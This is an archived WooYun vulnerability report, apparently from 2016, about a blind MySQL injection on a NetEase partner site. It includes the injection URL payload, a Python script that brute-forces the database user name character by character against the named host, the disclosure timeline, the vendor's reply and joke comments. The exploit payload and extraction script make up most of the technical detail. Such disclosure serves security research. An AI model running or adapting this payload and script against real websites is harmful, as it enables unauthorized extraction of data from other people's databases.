破壳企业应急安全(防御方向)课程 应急响应 勒索病毒 挖矿木马 DDOS 日志分析

网易某站点MySQL注射(附python脚本)

编号209010
Urlhttp://www.wooyun.org/bug.php?action=view&id=209010
漏洞状态厂商已经确认
漏洞标题网易某站点MySQL注射(附python脚本)
漏洞类型SQL注射漏洞
厂商网易
白帽子lijiejie
提交日期2016-05-15 18:06:00
公开日期2016-06-30 18:10:00
修复时间(not set)
确认时间2016-05-16 00:00:00
Confirm Spend1
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank10
厂商评级
厂商评rank1
漏洞简介
网易某站点MySQL注射(附python脚本)
漏洞细节

注射点:

http://m.zibo.house.163.com/jingmeil" and mid(lower(user()),1,1)="m" and "1"="1/p/1


path中的第一个参数可以注射。MySQL bool blind.

POC

猜解user()

[email protected]


m.zibo.house.163.com.mysqli.png


python脚本:

#encoding=utf-8
import httplib
import time
import string
import sys
import random
import urllib
import urllib
headers = {'User-Agent': 'Mozilla/5.0'}
payloads = list('[email protected]_.')
print 'Start to retrive MySQL User:'
user = ''
for i in range(1,26): #length of user() is 25
for payload in payloads:
print '.',
conn = httplib.HTTPConnection('m.zibo.house.163.com', timeout=60)
s = '/jingmeil"' + urllib.quote('and mid(lower(user()),%s,1)="%s" and "1"="1' % (i, payload)) + '/p/1'
conn.request(method='GET', url=s, headers=headers)
resp = conn.getresponse()
conn.close()
if resp.status == 200:
user += payload
print '\n[Scan in progress] %s' % user
break
print '\n[Done]MySQL user is ' + user

修复方案

过滤,转义

状态信息 2016-05-15: 细节已通知厂商并且等待厂商处理中
2016-05-16: 厂商已经确认,细节仅向厂商公开
2016-05-26: 细节向核心白帽子及相关领域专家公开
2016-06-05: 细节向普通白帽子公开
2016-06-15: 细节向实习白帽子公开
2016-06-30: 细节向公众公开
厂商回复该站点为第三方的合作站点,IP地址非网易IP,该站点系统由第三方负责开发和维护。目前域名已回收。感谢您对网易的关注!
回应信息危害等级:低漏洞Rank:1 确认时间:2016-05-16 18:04
Showing 1-14 of 14 items.
评论内容评论人点赞数评论时间

屠龙宝刀,点击就送

放逐02016-05-16 19:30:00

这脸打的,漂亮,网易等着收尸吧

’‘Nome02016-05-16 19:21:00

1 rank.......

麻辣小龙侠02016-05-16 18:30:00

屠龙宝刀,点击就送

Zeroyu02016-05-15 23:44:00

一定要上60级~

Soulmk02016-05-15 20:54:00

屠龙宝刀,点击就送

Letgo02016-05-15 20:06:00

我是陈小春,是兄弟就来xxxx

stupidddddd02016-05-15 19:32:00

===========================================================

大师兄02016-05-15 19:29:00

屠龙宝刀,点击就送

Slay02016-05-15 19:01:00

秒升999,上线送神器

iiiiiiiii02016-05-15 18:27:00

屠龙宝刀,点击就送

傻强_在路上02016-05-15 18:20:00

屠龙宝剑,双击就送

Exploit DB02016-05-15 18:14:00

屠龙宝刀,点击就送

黑色键盘丶02016-05-15 18:08:00

屠龙宝刀,点击就送

Aasron02016-05-15 18:06:00